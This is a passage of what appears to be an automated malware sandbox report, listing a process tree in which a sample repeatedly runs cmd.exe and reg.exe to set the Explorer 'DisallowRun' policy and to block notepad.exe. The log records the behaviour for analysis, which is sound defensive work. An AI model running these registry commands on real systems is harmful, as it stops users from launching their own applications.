    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4956
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4136
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2932
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1748
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4540
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1156
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2240
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3540
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4056
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4668
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4980
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4232
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1796
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1980
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3108
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2484
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3608
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4572
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4632
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4420
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3080
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:7104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:408
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3600
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:544
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2844
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1580
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5196
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5252
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5292
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5316
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5388
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5428
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5456
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5524
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:7060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5568
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5632
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5740
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5800
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5864
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5924
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6044
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6088
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4556
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5768
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6168
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6184
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6208
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6252
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6404
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6476
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6524
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6564
  - - C:\Windows\system32\reg.exe
